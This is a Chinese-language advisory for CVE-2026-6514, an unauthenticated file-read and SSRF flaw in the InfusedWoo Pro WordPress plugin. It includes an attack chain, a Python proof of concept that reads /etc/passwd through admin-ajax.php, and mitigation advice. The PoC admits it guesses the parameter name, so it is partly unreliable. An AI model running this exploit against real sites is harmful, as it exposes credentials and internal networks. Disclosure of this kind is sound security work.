CVE-2026-6514 CVSS 7.5 高危

CVE-2026-6514 InfusedWoo Pro插件任意文件读取漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6514

漏洞类型

任意文件读取

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

InfusedWoo Pro WordPress Plugin

漏洞概述

WordPress插件InfusedWoo Pro在5.1.2及之前的所有版本中存在严重的安全漏洞。该漏洞被归类为任意文件读取，通过`popup_submit`接口触发。未经身份验证的攻击者可利用此漏洞，诱导Web应用向任意目标位置发起Web请求。这不仅允许读取敏感文件，还可用于探测并修改内部服务的信息，导致数据泄露风险。

技术细节

该漏洞源于InfusedWoo Pro插件中`popup_submit`处理函数的输入验证缺失。在受影响版本中，该函数直接接收用户提供的参数并将其传递给文件处理函数（如`file_get_contents`），未限制允许的协议或路径前缀。攻击者可利用这一点，通过构造包含`file://`伪协议的Payload读取服务器上的任意敏感文件，如`wp-config.php`或系统密钥。此外，由于PHP允许通过封装协议处理网络资源，攻击者同样可以使用`http://`或`gopher://`等协议发起服务端请求伪造（SSRF）攻击。这使得攻击者能够绕过防火墙限制，探测内网服务、获取云服务元数据甚至对内部应用进行攻击。由于CVSS向量显示无需认证（PR:N）且攻击复杂度低（AC:L），该漏洞极易被自动化工具大规模利用。

攻击链分析

STEP 1

侦察与识别

攻击者使用网络扫描工具识别目标WordPress站点，并检测是否安装了InfusedWoo Pro插件及其版本号。

STEP 2

漏洞利用

攻击者向`/wp-admin/admin-ajax.php`发送特制的POST请求，参数中包含`action=popup_submit`以及带有`file://`或`http://`协议的恶意Payload。

STEP 3

数据读取与内网探测

服务器端处理该请求，读取本地敏感文件（如wp-config.php）或向攻击者指定的内部网络地址发起请求，返回响应数据。

STEP 4

后续渗透

利用读取到的数据库凭证进一步入侵数据库，或利用SSRF能力攻击内网其他服务（如AWS元数据服务）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: InfusedWoo Pro < 5.1.2 - Arbitrary File Read (SSRF)
# Date: 2026-05-14
# Exploit Author: Analyst
# Vendor Homepage: https://infusedwoo.com/
# Software Link: https://downloads.infusedwoo.com/updater/iw5.php?changelog
# Version: <= 5.1.2
# Tested on: WordPress 6.x

target_url = "http://example.com/wp-admin/admin-ajax.php"

# The vulnerable action is 'popup_submit'
# Attack vector: reading /etc/passwd via file wrapper
data = {
    "action": "popup_submit",
    # Parameter name might vary based on plugin implementation, assuming 'file' or 'url'
    "file": "file:///etc/passwd" 
}

try:
    response = requests.post(target_url, data=data)
    if response.status_code == 200:
        print("[+] Exploit successful! Response below:")
        print(response.text)
    else:
        print("[-] Exploit failed, status code:", response.status_code)
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

InfusedWoo Pro <= 5.1.2

防御指南

临时缓解措施

建议立即升级InfusedWoo Pro插件至最新版本以修复此漏洞。如果无法立即升级，应考虑临时禁用该插件，或通过Web应用防火墙（WAF）拦截针对`popup_submit`接口的恶意请求，同时严格限制服务器的出站网络访问权限，以防止SSRF攻击带来的内网探测风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表